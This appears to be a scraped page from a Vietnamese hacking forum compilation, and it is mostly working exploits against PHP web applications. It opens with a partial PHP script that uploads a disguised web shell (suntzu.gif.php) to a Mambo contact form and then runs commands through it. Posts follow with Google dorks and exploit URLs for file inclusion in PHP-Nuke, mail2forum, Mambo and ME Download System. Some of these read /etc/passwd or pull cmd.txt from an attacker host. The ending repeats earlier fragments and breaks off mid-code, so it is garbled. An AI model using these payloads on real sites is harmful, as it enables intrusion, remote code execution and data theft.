Hacker Professional Ebook part 392 doc

fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $itemid=$argv[3]; $cmd=""; $port=80; $proxy=""; for ($i=4; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"contact_name\";\r\n\r\n"; $data.="suntzu\r\n"; $data.=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"contact_email\";\r\n\r\n"; $data.="suntzu@suntzu.org\r\n"; $data.=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"contact_subject\";\r\n\r\n"; $data.="hereitissuntzu\r\n"; $data.=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"contact_text\";\r\n\r\n"; $data.="ohshit\r\n"; $data.=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"task\";\r\n\r\n"; $data.="post\r\n"; $data.=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"send\";\r\n\r\n"; $data.="Send\r\n"; $data.=" 7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"contact_attach\"; filename=\"suntzu.gif.php\";\r\n"; $data.="Content-Type: image/gif;\r\n\r\n"; $data.="<?php set_time_limit(0); echo 'my_delim';passthru(\$_SERVER['HTTP_SUNTZU']);die;?>\r\n"; $data.=" 7d529a1d23092a \r\n"; $packet ="POST ".$p."index.php?option=contact&Itemid=$itemid HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Type: multipart/form-data; boundary= 7d529a1d23092a\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $packet ="GET ".$p."images/contact/suntzu.gif.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="SUNTZU: ".$cmd."\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"my_delim")) { echo "exploit succeeded \r\n"; $temp=explode("my_delim",$html); die($temp[1]); } //if you are here echo "exploit failed \r\n"; ?> [/quote] navaro(HCE) local file include in PHP-Nuke (autohtml.php) google: allinurl:"autohtml.php" Xploit: Code: http://site/autohtml.php?op=modload&name=file muốn lấy ví dụ: Code: http://www.site.com/autohtml.php?op=modload&name= / / / /etc/passwd black_hat_cr(HCE) mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities ################################################## ############################# Discovered By OLiBekaS Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : mail for phpbb (bulletin board/forum software) version : latest version [ 1.2 ] URL : http://www.www.mail2forum.com dork : allinurl:/m2f_usercp.php? Exploit : http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attack er]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/c md.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attack er]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cm d.txt?&cmd=ls baby_hacker(HCE) Mambo component Remote Exploit Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download 1.0-Stable.zip bug found in file file_upload.php : require_once("$sbp/sb_helpers.php"); inject : http://website.com/components/com_si pload.php?sbp=[evil_script] Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink # milw0rm.com [2006-07-08] vns3curity(HCE) ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability Code: + + + ME Download System 1.3 Remote File Inclusion + + + + Affected Software .: ME Download System 1.3 + Venedor : http://www.ehmig.net/ + Class : Remote File Inclusion + Risk : high (Remote File Execution) . http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cm d.txt?&cmd=ls baby _hacker( HCE) Mambo component Remote Exploit Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion. Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink # milw0rm.com [2006-07-08] vns3curity(HCE) ME. HTTP/1.0 "; $packet.="Host: ".$host." "; $packet.="Content-Type: multipart/form-data; boundary= 7d529a1d23092a "; $packet.="Content-Length: ".strlen($data)." ";